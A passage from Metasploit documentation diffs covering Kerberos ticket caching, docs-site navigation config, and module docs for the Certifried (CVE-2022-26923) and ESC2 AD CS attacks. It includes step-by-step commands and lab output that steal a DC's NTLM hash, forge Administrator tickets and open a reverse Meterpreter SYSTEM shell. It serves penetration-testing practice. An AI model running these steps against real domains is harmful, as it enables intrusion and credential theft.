+  the FQDN like `WIN-MIJZ318SQH.msflab.local`. i.e. `Smb::Rhostname=WIN-MIJZ318SQH.msflab.local`
+* `${Prefix}Domain` -- The domain name of the target system, e.g. `msflab.local`. i.e. `SmbDomain=msflab.local`
+* `DomainControllerRhost` -- The IP address of the domain controller to use for kerberos authentication. i.e. `DomainControllerRhost=192.168.123.13`
+
+Optional options:
+* `${Prefix}::Krb5Ccname` -- The path to a CCACHE file to use for authentication. This is comparable to setting the
+  `KRB5CCNAME` environment variable for other tools. If specified, the tickets it contains will be used. i.e. `KRB5CCNAME=/path/to/Administrator.ccache`
+* `KrbCacheMode` -- The cache storage mode to use, one of the following four options:
+    * `none` -- No cache storage is used, new tickets are requested and no tickets are stored.
+    * `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
+    * `write-only` -- New tickets are requested and they are stored for reuse.
+    * `read-write` -- Stored tickets from the cache will be used and new tickets will be stored for reuse.
+* `${Prefix}KrbOfferedEncryptionTypes' -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
+
+## Ticket management
+
+When a write-enabled `KrbCacheMode` is used, tickets that are issued to Metasploit will be stored for reuse. The `klist`
+command can be used to view tickets. It is a top level command and can be run even if a module is in use.
+
+```
+msf6 > klist
+Kerberos Cache
+==============
+host            principal               sname                              issued                     status       path
+----            ---------               -----                              ------                     ------       ----
+192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL   2022-12-15 18:25:48 -0500  >>expired<<  /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_867855.bin
+192.168.159.10  smcintyre@MSFLAB.LOCAL  cifs/DC.msflab.local@MSFLAB.LOCAL  2022-12-15 18:25:48 -0500  >>expired<<  /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_699376.bin
+192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/msflab.local@MSFLAB.LOCAL   2022-12-16 14:51:50 -0500  valid        /home/smcintyre/.msf4/loot/20221216145149_default_192.168.159.10_mit.kerberos.cca_782487.bin
+192.168.159.10  smcintyre@MSFLAB.LOCAL  cifs/DC.msflab.local@MSFLAB.LOCAL  2022-12-16 17:07:48 -0500  valid        /home/smcintyre/.msf4/loot/20221216170747_default_192.168.159.10_mit.kerberos.cca_156303.bin
+192.168.159.10  smcintyre@MSFLAB.LOCAL  cifs/DC@MSFLAB.LOCAL               2022-12-16 17:08:26 -0500  valid        /home/smcintyre/.msf4/loot/20221216170825_default_192.168.159.10_mit.kerberos.cca_196712.bin
+192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/msflab.local@MSFLAB.LOCAL   2022-12-16 15:03:03 -0500  valid        /home/smcintyre/.msf4/loot/20221216150302_default_192.168.159.10_mit.kerberos.cca_729805.bin
+192.168.159.10  aliddle@MSFLAB.LOCAL    krbtgt/msflab.local@MSFLAB.LOCAL   2022-12-16 15:25:16 -0500  valid        /home/smcintyre/.msf4/loot/20221216152515_default_192.168.159.10_mit.kerberos.cca_934698.bin
+```
+
+More detailed information can be displayed by using the verbose (`-v` / `--verbose`) option.
+
+```
+msf6 > klist -v
+Kerberos Cache
+==============
+Cache[0]:
+  Primary Principal: Administrator@demo.local
+  Ccache version: 4
+
+  Creds: 1
+    Credential[0]:
+      Server: krbtgt/demo.local@demo.local
+      Client: Administrator@demo.local
+      Ticket etype: 18 (AES256)
+      Key: 9c66cb7de8f4d3100690771a753012eafa44a3d128342939ff9230b39aeb1713
+      Subkey: false
+      Ticket Length: 1090
+      Ticket Flags: 0x50e10000 (FORWARDABLE, PROXIABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
+      Addresses: 0
+      Authdatas: 0
+      Times:
+        Auth time: 2022-12-13 12:57:49 +0000
+        Start time: 2022-12-13 12:57:49 +0000
+        End time: 2022-12-13 22:57:49 +0000
+        Renew Till: 2022-12-14 12:57:49 +0000
+      Ticket:
+        Ticket Version Number: 5
+        Realm: demo.local
+        Server Name: krbtgt/demo.local
+        Encrypted Ticket Part:
+          Ticket etype: 18 (AES256)
+          Key Version Number: 2
+          Cipher:
+            [truncated]
+```
+
+The `klist` command can also be used for deleting tickets from the cache.
+
+## Ticket cache storage
+
+Metasploit stores tickets for future use in a user configurable way as controlled by the `KrbCacheMode` datastore
+option. When a user attempts to use Kerberos to authenticate to a remote service such as SMB, if the cache mode is
+read-enabled (e.g. set to `read-only` or `read-write`) and Metasploit is connected to a database, it will attempt to
+fetch an existing ticket using the following steps.
+
+1. First Metasploit will use the datastore options, including the target host and username to search though the stored
+   tickets for an SMB-specific Ticket Granting Service (TGS). If one is found, it will be used. Tickets that are expired
+   will not be used.
+2. If no TGS is found, Metasploit will repeat the search process looking for a Ticket Granting Ticket (TGT). If one is
+   found, it will be used to contact the Key Distribution Center (KDC) and request a TGS for authentication to the SMB
+   service.
+3. If no TGT is found, Metasploit will contact the KDC and authenticate using the username and password from the
+   datastore to request a TGT then an SMB-specific TGS before authenticating to the SMB service.
+
+If the cache mode is write-enabled (e.g. set to `write-only` or `read-write`) then any ticket, either TGT or TGS that is
+obtained either from the KDC or through other means, is stored for use in the cache. **If the cache mode is not
+write-enabled, tickets will not be stored.** Tickets are saved as loot, allowing them to be stored even if the database
+is not connected, however without the database, Metasploit can not lookup tickets for reuse as required by the
+read-enabled modes. Metasploit stores exactly one ticket per CCACHE file.
+
+Use a read-enabled cache mode to avoid unnecessary contact with the KDC. Use a write-enabled cache mode to store tickets
+for use with either Metasploit or other tools.
+
+## Using tickets with external tools
+When a ticket (either TGT or TGS) is stored, it is saved along with the other loot Metasploit has collected. The raw
+CCACHE files can be viewed with the `loot --type mit.kerberos.ccache` command (the `--type` argument filters for the
+specified type).
+
+```
+msf6 auxiliary(admin/dcerpc/icpr_cert) > loot --type mit.kerberos.ccache
+
+Loot
+====
+
+host            service  type                 name             content                   info                                                                  path
+----            -------  ----                 ----             -------                   ----                                                                  ----
+192.168.159.10           mit.kerberos.ccache                   application/octet-stream  realm: MSFLAB.LOCAL, client: smcintyre, server: krbtgt/msflab.local   /home/smcintyre/.msf4/loot/20221219105440_default_192.168.159.10_mit.kerberos.cca_905330.bin
+192.168.159.10           mit.kerberos.ccache                   application/octet-stream  realm: MSFLAB.LOCAL, client: smcintyre, server: cifs/dc.msflab.local  /home/smcintyre/.msf4/loot/20221219105440_default_192.168.159.10_mit.kerberos.cca_539055.bin
+```
+
+The path on the far right is where the CCACHE file is on disk. This path can be used with other tools such as Impacket
+through the `KRB5CCNAME` environment variable.
+
+For example:
+
+```
+[user@localhost]$ KRB5CCNAME=/home/smcintyre/.msf4/loot/20221219105440_default_192.168.159.10_mit.kerberos.cca_539055.bin \
+  python examples/smbclient.py  dc.msflab.local -target-ip 192.168.159.10 -k
+Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2021 SecureAuth Corporation
+
+Type help for list of commands
+# info
+Version Major: 10
+Version Minor: 0
+Server Name: DC
+Server Comment:
+Server UserPath: c:\
+Simultaneous Users: 16777216
+#
+```
+
+[1]: http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html
@@ -7,6 +7,53 @@ def without_prefix(prefix)
  proc { |value| value.sub(/^#{prefix}/, '') }
 end

+=begin
+Modify `NAVIGATION_CONFIG` to add additional items to the wiki site.
+The two support options are:
+
+1) If you are adding a new wiki page, which won't appear in msfconsole by default:
+
+- Add your new page to `metasploit-framework.wiki`
+- Add a new entry to NAVIGATION_CONFIG:
+```ruby
+{
+  path: 'My-New-Page.md'
+}
+```
+
+The title will be automatically derived from the markdown file. If you wish to override this title, use:
+
+```ruby
+{
+  path: 'My-New-Page.md',
+  title: 'Custom title for navigation link'
+}
+```
+
+You can also programmatically change titles with procs, i.e. using the `without_prefix` helper to generate
+a title from the filename with a being prefix removed:
+
+```ruby
+{
+  nav_order: 7,
+  path: 'Metasploit-Guide-PostgreSQL.md',
+  title: without_prefix('Metasploit Guide ')
+}
+```
+
+2) If you are embedding existing Metasploit module documentation into the wiki site, use relative paths:
+
+```ruby
+{
+  path: '../../documentation/modules/auxiliary/admin/kerberos/forge_ticket.md',
+  title: 'Silver and golden tickets'
+}
+```
+
+These module docs will appear in msfconsole as well as the generated docs site. Note that msfconsole does not
+support Mermaid syntax - used for generating sequence diagrams/charts/etc on the rendered docs site.
+
+=end
 NAVIGATION_CONFIG = [
  {
    path: 'Home.md',
@@ -37,33 +84,128 @@ NAVIGATION_CONFIG = [
        title: without_prefix('Metasploit Guide ')
      },
      {
+        nav_order: 5,
+        path: 'Metasploit-Guide-Kubernetes.md',
+        title: without_prefix('Metasploit Guide ')
+      },
+      {
+        nav_order: 5,
        path: 'Metasploit-Guide-HTTP.md',
        title: 'HTTP + HTTPS'
      },
      {
+        nav_order: 6,
        path: 'Metasploit-Guide-MySQL.md',
        title: without_prefix('Metasploit Guide ')
      },
      {
+        nav_order: 7,
        path: 'Metasploit-Guide-PostgreSQL.md',
        title: without_prefix('Metasploit Guide ')
      },
      {
+        nav_order: 8,
        path: 'Metasploit-Guide-SMB.md',
        title: without_prefix('Metasploit Guide ')
      },
      {
+        nav_order: 9,
        path: 'Metasploit-Guide-SSH.md',
        title: without_prefix('Metasploit Guide ')
      },
      {
+        nav_order: 10,
        path: 'Metasploit-Guide-WinRM.md',
        title: without_prefix('Metasploit Guide ')
      },
+
      {
-        path: 'Metasploit-Guide-Kubernetes.md',
+        nav_order: 11,
+        path: 'Metasploit-Guide-MSSQL.md',
        title: without_prefix('Metasploit Guide ')
-      }
+      },
+      {
+        nav_order: 12,
+        path: 'Metasploit-Guide-LDAP.md',
+        title: without_prefix('Metasploit Guide ')
+      },
+
+      {
+        title: 'Active Directory',
+        folder: 'active-directory',
+        nav_order: 13,
+        children: [
+          {
+            title: 'Kerberos',
+            folder: 'kerberos',
+            children: [
+              {
+                path: 'kerberos/overview.md',
+                title: 'Overview',
+                nav_order: 0
+              },
+              {
+                path: 'kerberos/service_authentication.md',
+                title: 'Authenticating to SMB/WinRM/etc',
+                nav_order: 1
+              },
+              {
+                path: '../../documentation/modules/auxiliary/scanner/kerberos/kerberos_login.md',
+                title: 'Kerberos login enumeration and bruteforcing',
+                nav_order: 2
+              },
+              {
+                path: '../../documentation/modules/auxiliary/admin/kerberos/get_ticket.md',
+                title: 'Get Ticket granting tickets and service tickets',
+                nav_order: 3,
+              },
+              {
+                path: '../../documentation/modules/auxiliary/admin/kerberos/forge_ticket.md',
+                title: 'Forging tickets',
+              },
+              {
+                path: '../../documentation/modules/auxiliary/admin/kerberos/inspect_ticket.md',
+                title: 'Inspecting tickets',
+              },
+              {
+                path: 'kerberos/kerberoasting.md',
+                title: 'Kerberoasting',
+              },
+              {
+                path: '../../documentation/modules/auxiliary/admin/kerberos/keytab.md',
+                title: 'Keytab support and decrypting wireshark traffic'
+              },
+              {
+                path: '../../documentation/modules/auxiliary/admin/kerberos/ticket_converter.md',
+                title: 'Converting kirbi and ccache files'
+              }
+            ]
+          },
+          {
+            title: 'AD CS',
+            folder: 'ad-certificates',
+            children: [
+              {
+                path: 'ad-certificates/overview.md',
+                title: 'Overview',
+                nav_order: 0,
+              },
+              {
+                path: '../../documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md',
+                title: 'Request certificates'
+              },
+              {
+                path: '../../documentation/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.md',
+                title: 'Vulnerable cert finder'
+              },
+              {
+                path: 'ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md',
+                title: 'Attacking AD CS ESC Vulnerabilities Using Metasploit'
+              },
+            ]
+          }
+        ]
+      },
    ]
  },
  {
@@ -97,20 +239,24 @@ NAVIGATION_CONFIG = [
            nav_order: 2
          },
          {
-            path: 'How-to-use-msfvenom.md',
+            path: 'How-to-use-a-Metasploit-module-appropriately.md',
            nav_order: 3
          },
          {
-            path: 'How-to-use-a-Metasploit-module-appropriately.md'
+            path: 'How-payloads-work.md',
+            nav_order: 4
          },
          {
-            path: 'How-payloads-work.md'
+            path: 'Module-Documentation.md',
+            nav_order: 5
          },
          {
-            path: 'Module-Documentation.md'
+            path: 'How-to-use-a-reverse-shell-in-Metasploit.md',
+            nav_order: 6
          },
          {
-            path: 'How-to-use-a-reverse-shell-in-Metasploit.md'
+            path: 'How-to-use-msfvenom.md',
+            nav_order: 7
          },
        ]
      },
@@ -230,6 +376,18 @@ NAVIGATION_CONFIG = [
              },
            ]
          },
+          {
+            title: 'RPC',
+            folder: 'RPC',
+            children: [
+              {
+                path: 'How-to-use-Metasploit-Messagepack-RPC.md'
+              },
+              {
+                path: 'How-to-use-Metasploit-JSON-RPC.md'
+              },
+            ]
+          },
        ]
      },
      {
@@ -0,0 +1,218 @@
+## Vulnerable Application
+
+This adds an auxiliary module that exploits a privilege escalation
+vulnerability in Active Directory Certificate Services (ADCS) known as
+Certifried (CVE-2022-26923) to generate a valid certificate impersonating the
+Domain Controller (DC) computer account. This certificate is then used to
+authenticate to the target as the DC account using PKINIT preauthentication
+mechanism. The module will get and cache the Ticket-Granting-Ticket (TGT) for
+this account along with its NTLM hash. Finally, it requests a TGS impersonating
+a privileged user (Administrator by default). This TGS can then be used by
+other modules or external tools.
+
+The module will go through the following steps:
+1. Check if the current user `ms-DS-MachineAccountQuota` let him add a computer account
+1. Create a computer account
+1. Change the new computer's `dNSHostName` attribute to match that of the DC
+1. Request a certificate for this computer account and cache it
+1. Authenticate to the remote host with the DC account's certificate and cache the TGT
+1. Retrieve the DC account's NTLM hash
+1. Escalate privileges by requesting a TGS impersonating a privileged domain user
+1. Delete the computer account (only possible if the privilege escalation
+   succeeded or if the current user is an administrator)
+
+### Installing ADCS on a DC
+(steps copied from https://github.com/rapid7/metasploit-framework/pull/16939)
+
+- Open the Server Manager
+- Select Add roles and features
+- Select "Active Directory Certificate Services" under the "Server Roles" section
+- When prompted add all of the features and management tools
+- On the AD CS "Role Services" tab, leave the default selection of only "Certificate Authority"
+- Complete the installation and reboot the server
+- Reopen the Server Manager
+- Go to the AD CS tab and where it says "Configuration Required", hit "More"
+  then "Configure Active Directory Certificate..."
+- Select "Certificate Authority" in the Role Services tab
+- Keep all of the default settings, noting the value of the "Common name for
+  this CA" on the "CA Name" tab (this value corresponds to the CA datastore
+  option)
+- Accept the rest of the default settings and complete the configuration
+- Restart the server to ensure LDAPS on port 636 is running
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use admin/dcerpc/cve_2022_26923_certifried`
+1. Do: `run rhosts=<remote host> username=<username> password=<user password> domain=<FQDN domain name> dc_name=<DC hostname> ca=<CA Name>`
+1. Verify the module executes all the steps listed above
+1. Verify the certificate is retrieved and stored in the loot
+1. Verify the authentication succeed and the TGT is retrieved
+1. Verify the NT hash for the DC is also retrieved
+1. Verify the impersonation worked and the resulting TGS is also retrieved
+
+- Verify the privilege escalation is successful using `psexec` module. It will
+  automatically use the TGS cached from the previous steps.
+
+1. Do: `use windows/smb/psexec`
+1. Do: `exploit rhosts=<remote host> lhost=<local host> smbuser=administrator smb::domain=<FQDN domain name> Smb::Auth=kerberos Smb::Rhostname=<DC hostname in FQDN format> DomainControllerRhost=<DC IP>`
+1. Verify you got a session as the `NT AUTHORITY\SYSTEM` user
+
+## Options
+
+### DC_NAME
+
+The name of the domain controller being targeted (must match RHOST)
+
+### LDAP_PORT
+
+The LDAP port. The default is 636 on an encrypted channel and 389 on a non-encrypted channel.
+
+### CA
+The target certificate authority. The default value used by AD CS is `$domain-DC-CA`.
+
+### USERNAME
+
+The username to authenticate with. This will be used for SMB, LDAP and Kerberos authentications.
+
+### PASSWORD
+
+The password to authenticate with. This will be used for SMB, LDAP and Kerberos authentications.
+
+### COMPUTER_NAME
+
+The computer name to add. A random name will be generated if not set.
+
+### COMPUTER_PASSWORD
+
+The password for the new computer. A random password will be generated if not set.
+
+### SPN
+
+The Service Principal Name used to request an additional impersonated TGS,
+format is `<service_name>/<hostname>.<FQDN>` (e.g. `ldap/dc01.mydomain.local`).
+Note that, independently of this option, a TGS for `cifs/<DC_NAME>.<DOMAIN>`
+will always be requested. This option is only available if the `PRIVESC` action
+is selected (default).
+
+### IMPERSONATE
+
+The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to
+request the ticket). Set to `Administrator` by default. This option is only
+available if the `PRIVESC` action is selected (default).
+
+## ACTIONS
+
+### REQUEST_CERT
+
+Request a certificate with DNS host name matching the DC, which is stored
+locally.
+
+### AUTHENTICATE
+
+Same as `REQUEST_CERT` but also authenticate as the DC account with Kerberos.
+This TGT and the NT hash are retrieved.
+
+### PRIVESC (default)
+
+The full privilege escalation attack, which results in a TGS impersonating the
+user set in the `IMPERSONATE` option (default is `Administrator`).
+
+## Scenarios
+
+### Windows Server 2019 Domain Controller with ADCS installed
+```
+msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run verbose=true rhosts=192.168.100.104 username=Test password=123456 domain=mylab.local dc_name=DC02 ca=mylab-DC02-CA
+[*] Running module against 192.168.100.104
+
+[*] 192.168.100.104:445 - Requesting the ms-DS-MachineAccountQuota value to see if we can add any computer accounts...
+[+] 192.168.100.104:445 - Successfully authenticated to LDAP (192.168.100.104:636)
+[*] 192.168.100.104:445 - ms-DS-MachineAccountQuota = 10
+[*] 192.168.100.104:445 - Connecting SMB with Test.mylab.local:123456
+[*] 192.168.100.104:445 - Connecting to Security Account Manager (SAM) Remote Protocol
+[*] 192.168.100.104:445 - Binding to \samr...
+[+] 192.168.100.104:445 - Bound to \samr
+[*] 192.168.100.104:445 - Using automatically identified domain: MYLAB
+[+] 192.168.100.104:445 - Successfully created MYLAB\DESKTOP-E0SYYS6U$
+[+] 192.168.100.104:445 -   Password: 4PuZlX57aULpEKXUZisjp227G0W0Rdvi
+[+] 192.168.100.104:445 -   SID:      S-1-5-21-419547006-9459028-4093171872-12345
+[*] 192.168.100.104:445 - Disconnecting SMB
+[+] 192.168.100.104:445 - Successfully authenticated to LDAP (192.168.100.104:636)
+[*] 192.168.100.104:445 - Retrieved original DNSHostame dc02.mylab.local for DC02
+[*] 192.168.100.104:445 - Attempting to set the DNS hostname for the computer DESKTOP-E0SYYS6U$ to the DNS hostname for the DC: DC02
+[*] 192.168.100.104:445 - Retrieved original DNSHostame dc02.mylab.local for DESKTOP-E0SYYS6U$
+[+] 192.168.100.104:445 - Successfully changed the DNS hostname
+[*] 192.168.100.104:445 - Connecting SMB with DESKTOP-E0SYYS6U$.mylab.local:4PuZlX57aULpEKXUZisjp227G0W0Rdvi
+[*] 192.168.100.104:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.100.104:445 - Binding to \cert...
+[+] 192.168.100.104:445 - Bound to \cert
+[*] 192.168.100.104:445 - Requesting a certificate for user DESKTOP-E0SYYS6U$ - digest algorithm: SHA256 - template: Machine
+[+] 192.168.100.104:445 - The requested certificate was issued.
+[*] 192.168.100.104:445 - Certificate stored at: /home/msfuser/.msf4/loot/20230112165003_default_192.168.100.104_windows.ad.cs_852935.pfx
+[*] 192.168.100.104:445 - Attempting PKINIT login for dc02$@mylab.local
+[+] 192.168.100.104:445 - Successfully authenticated with certificate
+[*] 192.168.100.104:445 - 192.168.100.104:445 - TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20230112165003_default_192.168.100.104_mit.kerberos.cca_654380.bin
+[*] 192.168.100.104:445 - Trying to retrieve NT hash for dc02$
+[+] 192.168.100.104:445 - 192.168.100.104:445 - Received a valid TGS-Response
+[+] 192.168.100.104:445 - Found NTLM hash for dc02$: aad3b435b51404eeaad3b435b51404ee:a93d16873c9d49be9b1bce4359dcaa6d
+[*] 192.168.100.104:445 - Getting TGS impersonating Administrator@mylab.local (SPN: cifs/DC02.mylab.local)
+[+] 192.168.100.104:445 - 192.168.100.104:88 - Received a valid TGS-Response
+[*] 192.168.100.104:445 - 192.168.100.104:445 - TGS MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20230112165003_default_192.168.100.104_mit.kerberos.cca_985570.bin
+[*] 192.168.100.104:445 - Disconnecting SMB
+[*] 192.168.100.104:445 - Connecting SMB with Test.mylab.local:123456
+[*] 192.168.100.104:445 - Connecting to Security Account Manager (SAM) Remote Protocol
+[*] 192.168.100.104:445 - Binding to \samr...
+[+] 192.168.100.104:445 - Bound to \samr
+[*] 192.168.100.104:445 - Using automatically identified domain: MYLAB
+[!] 192.168.100.104:445 - Unable to delete the computer account, this will have to be done manually with an Administrator account (Could not delete the computer DESKTOP-E0SYYS6U$: Error returned while deleting user in SAM server: (0xc0000022) STATUS_ACCESS_DENIED: {Access Denied} A process has requested access to an object but has not been granted those access rights.)
+[*] 192.168.100.104:445 - Disconnecting SMB
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > creds
+Credentials
+===========
+
+host             origin           service        public             private                                                            realm        private_type  JtR Format
+----             ------           -------        ------             -------                                                            -----        ------------  ----------
+192.168.100.104  192.168.100.104  445/tcp (smb)  DESKTOP-E0SYYS6U$  4PuZlX57aULpEKXUZisjp227G0W0Rdvi                                   MYLAB        Password
+192.168.100.104  192.168.100.104  445/tcp (smb)  dc02$              aad3b435b51404eeaad3b435b51404ee:a93d16873c9d49be9b1bce4359dcaa6d  MYLAB.LOCAL  NTLM hash     nt,lm
+
+msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > loot
+
+Loot
+====
+
+host             service  type                 name             content                   info                                                                      path
+----             -------  ----                 ----             -------                   ----                                                                      ----
+192.168.100.104           windows.ad.cs        certificate.pfx  application/x-pkcs12      MYLAB\ Certificate                                                        /home/msfuser/.msf4/loot/20230112165003_default_192.168.100.104_windows.ad.cs_852935.pfx
+192.168.100.104           mit.kerberos.ccache                   application/octet-stream  realm: MYLAB.LOCAL, client: dc02$, server: krbtgt/mylab.local             /home/msfuser/.msf4/loot/20230112165003_default_192.168.100.104_mit.kerberos.cca_654380.bin
+192.168.100.104           mit.kerberos.ccache                   application/octet-stream  realm: MYLAB.LOCAL, client: administrator, server: cifs/dc02.mylab.local  /home/msfuser/.msf4/loot/20230112165003_default_192.168.100.104_mit.kerberos.cca_985570.bin
+```
+
+### Using `psexec` with the TGS impersonating the Administrator
+```
+msf6 exploit(windows/smb/psexec) > exploit rhosts=192.168.100.104 lhost=192.168.100.1 smbuser=administrator smbdomain=mylab.local Smb::Auth=kerberos Smb::Rhostname=dc02.mylab.local DomainControllerRhost=192.168.100.104
+
+
+[*] Started reverse TCP handler on 192.168.100.1:4444
+[*] 192.168.100.104:445 - Connecting to the server...
+[*] 192.168.100.104:445 - Authenticating to 192.168.100.104:445|mylab.local as user 'administrator'...
+[*] 192.168.100.104:445 - 192.168.100.104:88 - Using cached credential for cifs/DC02.mylab.local@MYLAB.LOCAL Administrator@MYLAB.LOCAL
+[*] 192.168.100.104:445 - Selecting PowerShell target
+[*] 192.168.100.104:445 - Executing the payload...
+[+] 192.168.100.104:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (175686 bytes) to 192.168.100.104
+[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.104:64442) at 2023-01-12 16:50:55 +0100
+
+meterpreter > sysinfo
+Computer        : DC02
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MYLAB
+Logged On Users : 8
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
@@ -3,7 +3,7 @@ Request certificates via MS-ICPR (Active Directory Certificate Services). Depend
 template's configuration the resulting certificate can be used for various operations such as authentication.
 PFX certificate files that are saved are encrypted with a blank password.

-## Verification Steps
+## Module usage 

 1. From msfconsole
 2. Do: `use auxiliary/admin/dcerpc/icpr_cert`
@@ -25,6 +25,18 @@ Alternative DNS name to specify in the certificate. Useful in certain attack sce
 Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the
 format `$username@$dnsDomainName`.

+### PFX
+Certificate to request on behalf of. This is a PKCS12 file (using the .pfx extension), such as a one generated by
+previously running this module.
+
+### ON_BEHALF_OF
+Username to request on behalf of. This is in the format `$domain\\$username`.
+
+### DigestAlgorithm
+*This is an advanced option.*
+
+The digest algorithm to use for cryptographic signing operations.
+
 ## Actions

 ### REQUEST_CERT
@@ -37,13 +49,13 @@ For this module to work, it's necessary to know the name of a CA and certificate
 by a normal user via LDAP.

 ```
-msf6 > use auxiliary/gather/ldap_query 
+msf6 > use auxiliary/gather/ldap_query
 msf6 auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
 BIND_DN => aliddle@msflab.local
 msf6 auxiliary(gather/ldap_query) > set BIND_PW Password1!
 BIND_PW => Password1!
-msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_ADCS_CAS 
-ACTION => ENUM_ADCS_CAS
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_AD_CS_CAS
+ACTION => ENUM_AD_CS_CAS
 msf6 auxiliary(gather/ldap_query) > run
 [*] Running module against 192.168.159.10

@@ -71,7 +83,7 @@ In this scenario, an authenticated user issues a certificate for themselves usin
 by default. The user must know the CA name, which in this case is `msflab-DC-CA`.

 ```
-msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
@@ -111,7 +123,7 @@ See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910
 information.

 ```
-msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
@@ -137,3 +149,141 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/dcerpc/icpr_cert) >
 ```
+
+### Issue A Certificate With The *Any Purpose* EKU (AKA ESC2)
+In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate from a template
+that either contains the **Any Purpose** EKU or no EKUs at all.
+
+The user must know:
+
+* A vulnerable certificate template, in this case `ESC2-Test`.
+* A target account, in this case `MSFLAB\smcintyre`.
+
+See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910965cd2) section on ESC2 for more
+information.
+
+#### Step 1
+The first step is to issue a certificate using the vulnerable certificate template.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC2-Test
+CERT_TEMPLATE => ESC2-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+#### Step 2
+The second step is to run the module a second time, using the certificate template to request a certificate on behalf of
+the target user. The `CERT_TEMPLATE` option is updated to one allowing authentication such as the default `User`
+template.
+
+```
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
+PFX => /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
+ON_BEHALF_OF => MSFLAB\smcintyre
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Building certificate request on behalf of MSFLAB\smcintyre
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
+[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107153713_default_unknown_windows.ad.cs_275853.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+### Issue A Certificate With The *Certificate Request Agent* EKU (AKA ESC3)
+In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate from a template
